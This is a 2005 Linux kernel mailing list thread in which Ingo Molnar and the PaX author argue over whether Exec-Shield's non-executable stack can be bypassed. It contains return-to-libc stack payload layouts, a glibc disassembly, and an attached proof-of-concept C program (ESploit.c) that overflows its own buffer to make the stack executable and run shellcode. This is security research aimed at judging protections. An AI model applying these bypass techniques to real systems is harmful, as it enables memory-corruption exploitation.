* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer)
@ 2005-02-02 16:51 Ingo Molnar
2005-02-02 22:08 ` pageexec
0 siblings, 1 reply; 26+ messages in thread
From: Ingo Molnar @ 2005-02-02 16:51 UTC (permalink / raw)
To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o
* pageexec@freemail.hu <pageexec@freemail.hu> wrote:
> your concerns would be valid if this was impossible to achieve by an
> exploit, sadly, you'd be wrong too, it's possible to force an
> exploited application to call something like
> dl_make_stack_executable() and then execute the shellcode. [...]
and how do you force a program to call that function and then to execute
your shellcode? In other words: i challenge you to show a working
(simulated) exploit on Fedora (on the latest fc4 devel version, etc.)
that does that.
You can simulate the overflow itself so no need to find any real
application vulnerability, but show me _working code_ (or a convincing
description) that can call glibc's do_make_stack_executable() (or the
'many ways of doing this'), _and_ will end up executing your shell code
as well.
if you can do this i fully accept there's a problem.
Ingo
^ permalink raw reply [flat|nested] 26+ messages in thread* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-02 16:51 Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) Ingo Molnar @ 2005-02-02 22:08 ` pageexec 2005-02-03 9:44 ` Ingo Molnar 2005-02-03 13:55 ` Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) Peter Busser 0 siblings, 2 replies; 26+ messages in thread From: pageexec @ 2005-02-02 22:08 UTC (permalink / raw) To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o > and how do you force a program to call that function and then to execute > your shellcode? In other words: i challenge you to show a working > (simulated) exploit on Fedora (on the latest fc4 devel version, etc.) > that does that. i don't have any Fedora but i think i know roughly what you're doing, if some of the stuff below wouldn't work, let me know. > You can simulate the overflow itself so no need to find any real > application vulnerability, but show me _working code_ (or a convincing > description) that can call glibc's do_make_stack_executable() (or the > 'many ways of doing this'), _and_ will end up executing your shell code > as well. ok, since i get to make it up, here's the exploitable application then the exploit method (just the payload, i hope it's obvious how it works). ------------------------------------------------------------------ int parse_something(char * field, char * user_input) { ... strcpy(field, user_input+maybe_some_offset); ... } ------------------------------------------------------------------ int some_function(char * user_input, ...) { char field1[BUFLEN]; ... parse_something(field1, user_input); ... } ------------------------------------------------------------------ the stack just before the overflow looks like this: [...] [field1] [other locals] [saved EBP] [saved EIP] [user_input] [...] the overflow hits field1 and whatever is deemed necessary from that point on. i'll do this: [...] [field1 and other locals replaced with shellcode] [saved EBP replaced with anything in this case] [saved EIP replaced with address of dl_make_stack_executable()] [user_input left in place, i.e., overflow ends before this] [...] dl_make_stack_executable() will nicely return into user_input (at which time the stack has already become executable). as you can see in this particular case even a traditional strcpy() based overflow can get around ascii-armor and FORTIFY_SOURCE. if the overflow was of a different (more real-life, i'd say) nature, then it could very well be based on memcpy() which can copy 0 bytes and has no problems with ascii armor, or multiple overflows triggered from the same function (think parse_something() getting called in a parser loop) where you can compose more than one 0 byte on the stack, or not be based on any particular C library function and then all bets are off as to what one can/cannot do. if there's an address pointing back into the overflowed buffer somewhere deeper in the stack then i could have a payload like: [...] [shellcode] [saved EIP replaced with the address of a suitable 'retn' insn] [more addresses of 'retn'] [address of dl_make_stack_executable()] [pointer (in)to the overflowed buffer (shellcode)] [...] (this is actually the stack layout that a recent paper analysing ASLR used/assumed [1]). note that this particular exploit method would be greatly mitigated by a stack layout created by SSP [2] (meaning the local variable reordering, not the canary stuff). i could have also replaced the saved EBP (which becomes ESP eventually) with a suitable address (not necessarily on the stack even) where i can find (create) the [address of dl_make_stack_executable()] [shellcode address] pattern (during earlier interactions with the exploited application), but it requires whole application memory analysis (which you can bet any exploit writer worth his salt would do). speaking of ASLR/randomization, all that they mean for the above is a constant work factor (short of info leaking, of course), in the ES case it's something like 12 bits, for PaX it's 15-16 bits (on i386). [1] http://www.stanford.edu/~blp/papers/asrandom.pdf [2] http://www.trl.ibm.com/projects/security/ssp/ ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-02 22:08 ` pageexec @ 2005-02-03 9:44 ` Ingo Molnar 2005-02-03 14:20 ` pageexec 2005-02-03 13:55 ` Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) Peter Busser 1 sibling, 1 reply; 26+ messages in thread From: Ingo Molnar @ 2005-02-03 9:44 UTC (permalink / raw) To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > You can simulate the overflow itself so no need to find any real > > application vulnerability, but show me _working code_ (or a convincing > > description) that can call glibc's do_make_stack_executable() (or the > > 'many ways of doing this'), _and_ will end up executing your shell code > > as well. > the overflow hits field1 and whatever is deemed necessary from > that point on. i'll do this: > > [...] > [field1 and other locals replaced with shellcode] > [saved EBP replaced with anything in this case] > [saved EIP replaced with address of dl_make_stack_executable()] > [user_input left in place, i.e., overflow ends before this] > [...] > > dl_make_stack_executable() will nicely return into user_input > (at which time the stack has already become executable). wrong, _dl_make_stack_executable() will not return into user_input() in your scenario, and your exploit will be aborted. Check the glibc sources and the implementation of _dl_make_stack_executable() in particular. I've also attached the disassembly of _dl_make_stack_executable(), from glibc-2.3.4-3.i686.rpm. The sources are at: http://download.fedora.redhat.com/pub/fedora/linux/core/development/SRPMS/glibc-2.3.4-3.src.rpm Ingo 0000ec50 <_dl_make_stack_executable>: ec50: 55 push %ebp ec51: ba 0c 00 00 00 mov $0xc,%edx ec56: 89 e5 mov %esp,%ebp ec58: 57 push %edi ec59: 56 push %esi ec5a: 53 push %ebx ec5b: 83 ec 10 sub $0x10,%esp ec5e: 8b 08 mov (%eax),%ecx ec60: e8 a6 34 00 00 call 1210b <__i686.get_pc_thunk.bx> ec65: 81 c3 6f 73 00 00 add $0x736f,%ebx ec6b: 89 45 f0 mov %eax,0xfffffff0(%ebp) ec6e: 8b bb d0 fc ff ff mov 0xfffffcd0(%ebx),%edi ec74: 89 54 24 04 mov %edx,0x4(%esp) ec78: 8b 45 04 mov 0x4(%ebp),%eax ec7b: f7 df neg %edi ec7d: 21 cf and %ecx,%edi ec7f: 89 04 24 mov %eax,(%esp) ec82: ff 93 94 fe ff ff call *0xfffffe94(%ebx) ec88: 85 c0 test %eax,%eax ec8a: 0f 85 da 00 00 00 jne ed6a <_dl_make_stack_executable+0x11a> ec90: 8b 45 f0 mov 0xfffffff0(%ebp),%eax ec93: 8b b3 34 ff ff ff mov 0xffffff34(%ebx),%esi ec99: 39 30 cmp %esi,(%eax) ec9b: 0f 85 c9 00 00 00 jne ed6a <_dl_make_stack_executable+0x11a> eca1: 80 bb d4 04 00 00 00 cmpb $0x0,0x4d4(%ebx) eca8: 0f 84 82 00 00 00 je ed30 <_dl_make_stack_executable+0xe0> ecae: 8b 83 d0 fc ff ff mov 0xfffffcd0(%ebx),%eax ecb4: 8d 34 c5 00 00 00 00 lea 0x0(,%eax,8),%esi ecbb: 8d 3c 38 lea (%eax,%edi,1),%edi ecbe: 89 f6 mov %esi,%esi ecc0: 29 f7 sub %esi,%edi ecc2: 8b 93 14 ff ff ff mov 0xffffff14(%ebx),%edx ecc8: 81 e2 ff ff ff fe and $0xfeffffff,%edx ecce: 89 54 24 08 mov %edx,0x8(%esp) ecd2: 89 74 24 04 mov %esi,0x4(%esp) ecd6: 89 3c 24 mov %edi,(%esp) ecd9: e8 22 2a 00 00 call 11700 <__mprotect> ecde: 85 c0 test %eax,%eax ece0: 74 de je ecc0 <_dl_make_stack_executable+0x70> ece2: 8b 83 08 05 00 00 mov 0x508(%ebx),%eax ece8: 83 f8 0c cmp $0xc,%eax eceb: 75 3b jne ed28 <_dl_make_stack_executable+0xd8> eced: 39 b3 d0 fc ff ff cmp %esi,0xfffffcd0(%ebx) ecf3: 74 5b je ed50 <_dl_make_stack_executable+0x100> ecf5: 89 f1 mov %esi,%ecx ecf7: d1 e9 shr %ecx ecf9: 89 ce mov %ecx,%esi ecfb: 01 cf add %ecx,%edi ecfd: 8b 93 14 ff ff ff mov 0xffffff14(%ebx),%edx ed03: 81 e2 ff ff ff fe and $0xfeffffff,%edx ed09: 89 54 24 08 mov %edx,0x8(%esp) ed0d: 89 74 24 04 mov %esi,0x4(%esp) ed11: 89 3c 24 mov %edi,(%esp) ed14: e8 e7 29 00 00 call 11700 <__mprotect> ed19: 85 c0 test %eax,%eax ed1b: 74 a3 je ecc0 <_dl_make_stack_executable+0x70> ed1d: 8b 83 08 05 00 00 mov 0x508(%ebx),%eax ed23: 83 f8 0c cmp $0xc,%eax ed26: 74 c5 je eced <_dl_make_stack_executable+0x9d> ed28: 83 c4 10 add $0x10,%esp ed2b: 5b pop %ebx ed2c: 5e pop %esi ed2d: 5f pop %edi ed2e: 5d pop %ebp ed2f: c3 ret ed30: 8b 8b 14 ff ff ff mov 0xffffff14(%ebx),%ecx ed36: 89 4c 24 08 mov %ecx,0x8(%esp) ed3a: 8b 93 d0 fc ff ff mov 0xfffffcd0(%ebx),%edx ed40: 89 3c 24 mov %edi,(%esp) ed43: 89 54 24 04 mov %edx,0x4(%esp) ed47: e8 b4 29 00 00 call 11700 <__mprotect> ed4c: 85 c0 test %eax,%eax ed4e: 75 27 jne ed77 <_dl_make_stack_executable+0x127> ed50: 83 8b 34 04 00 00 01 orl $0x1,0x434(%ebx) ed57: 31 c0 xor %eax,%eax ed59: 8b 7d f0 mov 0xfffffff0(%ebp),%edi ed5c: c7 07 00 00 00 00 movl $0x0,(%edi) ed62: 83 c4 10 add $0x10,%esp ed65: 5b pop %ebx ed66: 5e pop %esi ed67: 5f pop %edi ed68: 5d pop %ebp ed69: c3 ret ed6a: 83 c4 10 add $0x10,%esp ed6d: b8 01 00 00 00 mov $0x1,%eax ed72: 5b pop %ebx ed73: 5e pop %esi ed74: 5f pop %edi ed75: 5d pop %ebp ed76: c3 ret ed77: 8b 83 08 05 00 00 mov 0x508(%ebx),%eax ed7d: 83 f8 16 cmp $0x16,%eax ed80: 75 a6 jne ed28 <_dl_make_stack_executable+0xd8> ed82: c6 83 d4 04 00 00 01 movb $0x1,0x4d4(%ebx) ed89: e9 20 ff ff ff jmp ecae <_dl_make_stack_executable+0x5e> ed8e: 90 nop ed8f: 90 nop ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-03 9:44 ` Ingo Molnar @ 2005-02-03 14:20 ` pageexec 2005-02-03 20:20 ` Ingo Molnar 0 siblings, 1 reply; 26+ messages in thread From: pageexec @ 2005-02-03 14:20 UTC (permalink / raw) To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o > > dl_make_stack_executable() will nicely return into user_input > > (at which time the stack has already become executable). > > wrong, _dl_make_stack_executable() will not return into user_input() in > your scenario, and your exploit will be aborted. Check the glibc sources > and the implementation of _dl_make_stack_executable() in particular. oh, you mean the invincible __check_caller(). one possibility: [...] [field1 and other locals replaced with shellcode] [value of __libc_stack_end] [some space for the local variables of dl_make_stack_executable and others] [saved EBP replaced with anything in this case] [saved EIP replaced with address of a 'pop eax'/'retn' sequence] [address of [value of __libc_stack_end], loads into eax] [address of dl_make_stack_executable()] [address of a suitable 'retn' insn in ld.so/libpthread.so] [user_input left in place, i.e., overflows end before this] [...] this payload needs two overflows to construct the two 0 bytes needed (a memcpy based one would easily get away with one of course) and an extra condition in that in order to load eax we need to find an addressable (executable memory outside the ascii armor, this may very well include some library/main executable .data/.bss as well under Exec-Shield) 2 byte sequence that encodes pop eax/retn or popad/retn (for the latter the stack has to be filled appropriately with more data of course). other sequences could do the job as well, these two are just the trivial ones that come to mind and i found in some binaries i checked quickly (my sshd also has a sequence of pop eax/pop ebx/pop esi/pop edi/pop ebp/retn for example, suitable as well). the question of whether you can get away with one overflow (strcpy() or similar based) is open, i don't quite have the time to hunt down all the nice insn sequences that can help loading registers with proper content and execute dl_make_stack_executable() or a suitable part of it. at least there's no explicit mechanism in this system that would prevent it in a guaranteed way. ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-03 14:20 ` pageexec @ 2005-02-03 20:20 ` Ingo Molnar 2005-02-07 14:23 ` pageexec 0 siblings, 1 reply; 26+ messages in thread From: Ingo Molnar @ 2005-02-03 20:20 UTC (permalink / raw) To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > > dl_make_stack_executable() will nicely return into user_input > > > (at which time the stack has already become executable). > > > > wrong, _dl_make_stack_executable() will not return into user_input() in > > your scenario, and your exploit will be aborted. Check the glibc sources > > and the implementation of _dl_make_stack_executable() in particular. > > oh, you mean the invincible __check_caller(). one possibility: > > [...] > [field1 and other locals replaced with shellcode] > [value of __libc_stack_end] > [some space for the local variables of dl_make_stack_executable and others] > [saved EBP replaced with anything in this case] > [saved EIP replaced with address of a 'pop eax'/'retn' sequence] > [address of [value of __libc_stack_end], loads into eax] > [address of dl_make_stack_executable()] > [address of a suitable 'retn' insn in ld.so/libpthread.so] > [user_input left in place, i.e., overflows end before this] > [...] still wrong. What you get this way is a nice, complicated NOP. Ingo ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-03 20:20 ` Ingo Molnar @ 2005-02-07 14:23 ` pageexec 2005-02-07 21:08 ` Ingo Molnar 2005-02-07 22:36 ` Ingo Molnar 0 siblings, 2 replies; 26+ messages in thread From: pageexec @ 2005-02-07 14:23 UTC (permalink / raw) To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o [-- Attachment #1: Mail message body --] [-- Type: text/plain, Size: 2581 bytes --] > still wrong. What you get this way is a nice, complicated NOP. not only a nop but also a likely crash given that i didn't adjust the declaration of some_function appropriately ;-). let's cater for less complexity too with the following payload (of the 'many other ways' kind): [field1 and other locals replaced with shellcode] [space to cover the locals of __libc_dlopen_mode()] [fake EBX] [fake ESI] [fake EBP] [address of field1 (shellcode)] [address of user_input+x, ends with "libbeecrypt.so"] [fake mode for __libc_dlopen_mode(), 0x01010101 will do] [space for the local variables of __libc_dlopen_mode() and others] [saved EBP replaced with address of [fake EBP]] [saved EIP replaced with address of __libc_dlopen_mode()+3] [user_input no longer used in the exploit] user_input (the original, untouched buffer) ends with a suitable library name (such as "libbeecrypt.so", see [1]). this string could have also been left behind in the address space somewhere during earlier interactions. we have to produce one 0 byte only hence we're back at the generic single overflow case. this also no longer relies on the user_input argument being at a particular address on the stack, so it's a generic method in that regard as well. one disadvantage of this approach is that now not only the randomness in libc.so has to be found but also that of the stack (repeating parts of the payload would help reduce it though), and if user_input itself is on the heap (and there're no copies on the stack), we'll need that randomness too. in any case, you got your exploit method against latest Fedora (see the attachment [2]), this should prove that paxtest does the right thing when it exposes the weaknesses of Exec-Shield. now, will you and Arjan do the right thing and apologize to us or do you still maintain that paxtest is a sabotage? [1] https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=132149 it also appears that not only the design and implementation of PT_GNU_STACK are broken but its deployment as well. not even its creators managed to get it right, what can we expect from unsuspecting distros? 5 months and still no resolution? does this backdoor really belong into linux? [2] ESploit.c is a simple proof of concept self-exploiting test that will hang itself when successful. compiler optimizations and randomizations can introduce 0 bytes in some of the addresses used (check shellcode length), play with them a bit to get it to run. stack usage in the (ab)used libc functions may also require adjusting the buffer sizes. [-- Attachment #2: Attachment information. --] [-- Type: text/plain, Size: 472 bytes --] The following section of this message contains a file attachment prepared for transmission using the Internet MIME message format. If you are using Pegasus Mail, or any other MIME-compliant system, you should be able to save it or view it from within your mailer. If you cannot, please ask your system administrator for assistance. ---- File information ----------- File: ESploit.c Date: 8 Feb 2005, 0:07 Size: 1294 bytes. Type: Program-source [-- Attachment #3: ESploit.c --] [-- Type: Application/Octet-stream, Size: 1294 bytes --] #define _GNU_SOURCE #include <stdio.h> #include <dlfcn.h> char buffer[8192]; void * handle, * mydlopen, * retaddr; unsigned long eip, fakeebp, * tmp = (unsigned long*)buffer; void overflow(char * field1, char * user_input) { strcpy(field1, user_input); } int main() { unsigned long shellcode[1024]; handle = dlopen(NULL, RTLD_LAZY); if (!handle) { printf("dlopen error: %s\n", dlerror()); return -1; } dlerror(); mydlopen = dlsym(handle, "__libc_dlopen_mode"); if (!dlerror) { printf("dlsym error\n"); return -1; } printf("mydlopen: %p\n", mydlopen); retaddr = __builtin_return_address(0); printf("retaddr: %p\n", retaddr); for (eip=0; eip<16384; eip++) { if (shellcode[eip] == (unsigned long)retaddr) break; } if (16384 == eip) { printf("can't find saved EIP\n"); return -1; } printf("saved EIP: %p at index %u\n", shellcode+eip, eip); memset(buffer, 0xFA, sizeof buffer); buffer[0] = 0xEB; buffer[1] = 0xFE; fakeebp = eip-1000; tmp[eip-1] = &shellcode[fakeebp]; tmp[eip] = (char*)mydlopen+3; tmp[eip+1] = 0; tmp[fakeebp+1] = shellcode; tmp[fakeebp+2] = "libbeecrypt.so"; tmp[fakeebp+3] = 0x01010101; printf("shellcode length: %x\n", strlen(buffer)); overflow(shellcode, buffer); return 0; } ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-07 14:23 ` pageexec @ 2005-02-07 21:08 ` Ingo Molnar 2005-02-08 12:27 ` pageexec 2005-02-07 22:36 ` Ingo Molnar 1 sibling, 1 reply; 26+ messages in thread From: Ingo Molnar @ 2005-02-07 21:08 UTC (permalink / raw) To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > still wrong. What you get this way is a nice, complicated NOP. > > not only a nop but also a likely crash given that i didn't adjust > the declaration of some_function appropriately ;-). let's cater > for less complexity too with the following payload (of the 'many > other ways' kind): > > [field1 and other locals replaced with shellcode] > [space to cover the locals of __libc_dlopen_mode()] yes, i agree with you, __libc_dlopen_mode() is an easier target (but not _that_ easy of a target, see further down), and your code looks right - but what this discussion was about was the _dl_make_stack_executable() function. Similar 'protection' techniques can be used for __libc_dlopen_mode() too, and it's being fixed. (you'd be correct to point out that what cannot be 'fixed' even this way are libdl.so using applications and the dlopen() symbol - for them, if randomization is not enough, PaX or SELinux is the fix.) > one disadvantage of this approach is that now not only the randomness > in libc.so has to be found but also that of the stack (repeating parts > of the payload would help reduce it though), and if user_input itself > is on the heap (and there're no copies on the stack), we'll need that > randomness too. such an attack needs to get 2 or 3 random values right - which, considering 13-bits randomization per value is still 26-39 bits (minus the constant number of bits you can get away via replication). If the stack wasnt nonexec then the attack would need to get only 1 random value right. In that sense it still makes quite a difference in increasing the complexity of the attack, do you agree? Yes, the drastic method is to disable the adding of code to a process image altogether (PaX did this first, and does a nice job in that, and SELinux is catching up as well), but that clearly was not a product option when PT_GNU_STACK was written. As you can see on lkml, people are resisting changes hard that affect 2-3 apps. What chances do changes have that break dozens of common applications? PT_GNU_STACK is not perfect, but it was the maximum we could get away on the non-selinux side of the distribution, mapping many of the dependencies and assumptions of apps. So PT_GNU_STACK is certainly a beginning, and as the end result (hopefully soon) we can do away with libraries having any RWE PT_GNU_STACK markings (so that only binaries can carry RWE) and can move make_stacks_executable() from libc.so. You seem to consider these steps of how Fedora 'morphs' into a productized version of SELinux as 'fully vulnerable' (and despise it), there's no way around walking that walk and persuading users to actually follow - which is the hardest part. Ingo ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-07 21:08 ` Ingo Molnar @ 2005-02-08 12:27 ` pageexec 2005-02-08 21:23 ` Ingo Molnar 0 siblings, 1 reply; 26+ messages in thread From: pageexec @ 2005-02-08 12:27 UTC (permalink / raw) To: Ingo Molnar; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o > yes, i agree with you, __libc_dlopen_mode() is an easier target (but not > _that_ easy of a target, see further down), and your code looks right actually, line 25 is crap (talk about 'coding while intoxicated' ;-), it should be 'if (dlerror())' of course. also, you should really try to run the code as it exposes a bug in your handling of PT_GNU_STACK and RELRO and dlopen(), at least i ran into it on my system and a user reported it under FC3 too (hint: '__stack_prot attribute_relro' is not such a great idea). > but what this discussion was about was the _dl_make_stack_executable() > function. the jury is still out on that one, i just don't have the time and beer to do the full research that a real exploit writer would do. in security, unless proven otherwise, we try to assume the worse case. and given how there's no specific uncircumventable protection measure in that function either, i wouldn't be surprised at all if it can be directly exploited. second, __libc_dlopen_mode *does* make use of said function, albeit not directly, but it's still the work horse (and the underyling (in)security problem), so to speak. > Similar 'protection' techniques can be used for __libc_dlopen_mode() > too, and it's being fixed. if you mean __check_caller() and others, i have my doubts, if a symbol can be looked up by dlsym() then you can't assume that no real life app does it already (and would break if you enforced libc-only callers). yes, you can argue that this symbol should not have been visible to everyone to begin with, but it's now after the fact. the bigger problem is however that you're once again fixing the symptoms, instead of the underlying problem - not the correct approach/mindset. also consider that __check_caller() and the other 'security' techniques you put into Fedora are all trivially breakable in an memcpy() or similar overflow (this whole exercise here was about showing how even string based overflows can still be exploited). > (you'd be correct to point out that what cannot be 'fixed' even this way > are libdl.so using applications and the dlopen() symbol - for them, if > randomization is not enough, PaX or SELinux is the fix.) for example apache links against libdl, so there are real life apps out there affected by this technique. i don't see how SElinux enters this picture though, it (and other access control mechanisms) serve a different purpose, they don't stop exploits of memory corruption bugs, they enforce least privilege (to whatever degree). the danger of relying on access control under Exec-Shield is that once an attacker can execute his own code on the target system (ESploit shows how), all it takes is a single exploitable kernel bug and he's in for good. and as the past months have shown, such bugs are not exactly unheard of in linux land. > such an attack needs to get 2 or 3 random values right - which, > considering 13-bits randomization per value is still 26-39 bits (minus > the constant number of bits you can get away via replication). the maths doesn't quite work that way. what matters is not how many random values you have to get right, but how much entropy you have to get right. the difference is that if two random values have the same entropy (e.g., they have a constant difference or are derived from the same randomness at least, something an attacker can observe on a test system) then that's only one randomness to guess, not two. in my example exploit payload we have one random value from libc and a few on the stack - the latter share the entropy. this should also explain why PaX doesn't bother with individual library randomization and why your recent submission into -mm is missing the target (not to mention implementation issues), it's just a waste of entropy when an exploit doesn't need more than one library (and as ESploit shows, it doesn't). i'd also add that all this number juggling becomes worthless if information can be leaked from the attacked task. so the maths under Exec-Shield would be 12+16 bits or so, if i'm not mistaken. whether that actually means 12+16=28 or log2(2^12+2^16)~=16 depends on whether an attacker has to learn (guess) them together at once, or can learn them individually. the paper i linked to in my first post in this thread shows you a technique that can find out the libc randomization without having to learn the stack one. that technique is neither new nor the only one that can do this. to your defense, i'd held this belief 3 years ago too (i.e., that randomness of different areas would have to be guessed at once) but for some time i'm much less sure that it's a useful generic assumption. > If the stack wasnt nonexec then the attack would need to get only > 1 random value right. In that sense it still makes quite a difference > in increasing the complexity of the attack, do you agree? based on the above explanation of what i know, i don't agree *in general*, it has to be rather a special case when one really has to guess different randomizations at once (again, unless proven otherwise, i'll assume the worse case). on another note, increasing the complexity of exploits this way is not a good idea if you want the slightest security guarantees for your system. the problem is that without a crash monitoring/reaction mechanism one can just happily keep trying and eventually get in - what is the point then? in the PaX strategy the reason for using randomization is that we can't do much (yet) against the two other classes of exploit techniques plus it's a cheap measure, so 'why not'. but it's not a security measure in the sense that controlling runtime code generation is. in other words, the security guarantee that PaX gives doesn't rely on randomization, while you seem to be putting too much faith into it when discussing the value provided by Exec-Shield. even with crash monitoring/reaction one can only claim a 'probabilistic guarantee', something that's not always good enough (it's may be ok on a client system where you protect say a web browser but it's less useful on servers because of service level constraints). > Yes, the drastic method is to disable the adding of code to a process > image altogether (PaX did this first, and does a nice job in that, and > SELinux is catching up as well), but that clearly was not a product > option when PT_GNU_STACK was written. again, SElinux doesn't do memory protection per se, it has to be (and is) a VM subsystem thing. what they did recently is rounding out the memory protection facilites of the VM by adding access control for executable mappings. we've done all this in grsecurity for something like 4 years now and in Hardened Gentoo we've had SElinux working with PaX for a year, similar for RSBAC. > As you can see on lkml, people are resisting changes hard that > affect 2-3 apps. What chances do changes have that break dozens of > common applications? i don't see your dilemma. having the ability to control runtime code generation (making it a privilege, instead of a given) is orthogonal to its deployment strategy (that mostly comes down to 'default on' or 'default off'). i don't think the kernel should have the policy for the latter, it's better left for users/distros. the kernel should however provide the means to implement policies that restrict runtime code generation. in my opinion anyway. as a distro, you can make it 'default off' and you're set for backwards compatibility while giving users at least the option to begin using the extra security measures. then work on your distro to be able to enable the restrictions on more and more apps or to be able to run with 'default on' (and/or have a 'hardened' version that does the latter from the beginning). in the PaX world we have Adamantix and Hardened Gentoo that run with 'default on'. you also seem to have been following this strategy with SElinux, i don't see why it wouldn't work with other security measures then. now if you try the 'default on' approach then you'll actually break apps. in my experience, they come in these flavours: - apps that need to generate code at runtime but do so without asking for the right memory permissions, e.g., libjvm.so having code in .data. as Linus also said in another thread lately, they're broken and should be fixed. problem is of course 3rd party/binary stuff that cannot be fixed just like that. - apps that generate code at runtime but don't really need to. think of nested function trampolines, the XFree86 ELF loader, etc. these apps are arguably 'broken', from my point of view they're carelessly written as they need more privileges than what is really necessary. for the past few years i've tried to help various projects to eliminate these problems, but there's always more work to do... - apps that by their nature want/need to generate code at runtime. think VMs/JIT engines, etc. they of course cannot be 'fixed' as they're not broken per se. rather, they have to be allowed to generate code at runtime, and in as secure a way as possible. to solve all these problems one needs at least a system that can grant this privilege on a per app basis. the PaX solution is the PT_PAX_FLAGS ELF program header and the access control system hooks. PT_GNU_STACK doesn't solve these problems, i explained in your bugzilla why that is. now imagine if i had added support for PT_GNU_STACK in PaX, i would have opened up a true backdoor that every exploit writer with half a brain could have abused to break PaX a la ESploit. > PT_GNU_STACK is not perfect, that's quite an understatement Ingo, if you want my uncensored opinion, it's utter crap. it would be nice if you guys actually responded to my claims in your bugzilla instead of remaining silent or trying to explain it away in generic terms as above. your work affects the whole linux world and they deserve to know. and on a personal note, it's getting really tiring to scan latest 2.6.x for patches i have to revert or work around in PaX. > but it was the maximum we could get away on the non-selinux side of > the distribution, mapping many of the dependencies and assumptions > of apps. you weren't even trying to solve the right problem, no wonder you came up with something as broken as PT_GNU_STACK. the problem, once again, for those not bothering to read your bugzilla, is not whether an app wants an executable stack or not, it's about the privilege of runtime code generation. it affects the stack just as much as it does the heap, anon mappings, .data/.bss, whatever. now you can argue that this ability should not be a privilege, then it's fine, we're just solving completely different security issues (which is probably not the case as your work claims to protect against the same exploits that PaX does). > So PT_GNU_STACK is certainly a beginning, and as the end result > (hopefully soon) we can do away with libraries having any RWE > PT_GNU_STACK markings (so that only binaries can carry RWE) and can > move make_stacks_executable() from libc.so. i'd like to see how that will solve the problem when an app uses dlopen() to open a library that uses nested function trampolines. i hope you're not suggesting that you'll be able to rewrite the whole world and get rid of such libraries (which, however a noble goal, is impossible). and if it will take 5+ months for each such case, i see only bad news for Fedora. once again, you believe that by trying to handle the symptoms, the underlying disease will go away. it won't, but for my part i'll stop contributing more exploit techniques here, it apparently is a pointless exercise. > You seem to consider these steps of how Fedora 'morphs' into a > productized version of SELinux as 'fully vulnerable' (and despise it), you again bring up SElinux, i can't fathom how it has anything to do with what i said about Exec-Shield, PT_GNU_STACK and related issues. if i have a problem then it's about your (you and your colleagues) whole attitude and approach to security. read again this response you gave me and tell me where you addressed a *single* technical issue i raised here or in your bugzilla. see the problem? do you understand that PT_GNU_STACK is broken by *design* (or rather, its lack thereof)? is there noone among the PT_GNU_STACK creators who has anything to say about my claims? all agree? or disagree? have you got any arguments we can discuss? > there's no way around walking that walk and persuading users to > actually follow - which is the hardest part. what's even harder is making you understand that what you are giving your users and customers is false claims and sense of security. and i still haven't heard from you guys on the paxtest 'sabotage'. ^ permalink raw reply [flat|nested] 26+ messages in thread
* Re: Sabotaged PaXtest (was: Re: Patch 4/6 randomize the stack pointer) 2005-02-08 12:27 ` pageexec @ 2005-02-08 21:23 ` Ingo Molnar 0 siblings, 0 replies; 26+ messages in thread From: Ingo Molnar @ 2005-02-08 21:23 UTC (permalink / raw) To: pageexec; +Cc: linux-kernel, Arjan van de Ven, Theodore Ts'o * pageexec@freemail.hu <pageexec@freemail.hu> wrote: > > but what this discussion was about was the _dl_make_stack_executable() > > function. > > the jury is still out on that one, i just don't have the time and beer > to do the full research that a real exploit writer would do. in > security, unless proven otherwise, we try to assume the worse case. > and given how there's no specific uncircumventable protection measure > in that function either, i wouldn't be surprised at all if it can be > directly exploited. well. It's at least not as trivial as you made it sound ;-) > second, __libc_dlopen_mode *does* make use of said function, albeit > not directly, but it's still the work horse (and the underyling > (in)security problem), so to speak. that's correct. > > Similar 'protection' techniques can be used for __libc_dlopen_mode() > > too, and it's being fixed. > > if you mean __check_caller() and others, i have my doubts, if a symbol > can be looked up by dlsym() then you can't assume that no real life > app does it already (and would break if you enforced libc-only > callers). yes, you can argue that this symbol should not have been > visible to everyone to begin with, but it's now after the fact. relying on internal glibc symbols has always been frowned upon. The name can change anytime, the API can change. So no, this is not an issue. > the bigger problem is however that you're once again fixing the > symptoms, instead of the underlying problem - not the correct > approach/mindset. my position is that there is _no_ 100% solution (given the circumstances), hence it's all a probabilistic game and about balancing between tradeoffs. > > (you'd be correct to point out that what cannot be 'fixed' even this way > > are libdl.so using applications and the dlopen() symbol - for them, if > > randomization is not enough, PaX or SELinux is the fix.) > > for example apache links against libdl, so there are real life apps > out there affected by this technique. [...] yes. But not all hope is lost, there's a linker feature that avoids the dlopen()ing of RWE DSOs. We've activated this and this will solve at least the libbeecrypt-alike problems. > [...] i don't see how SElinux entersthis picture though, it (and other > access control mechanisms) serve a different purpose, they don't stop > exploits of memory corruption 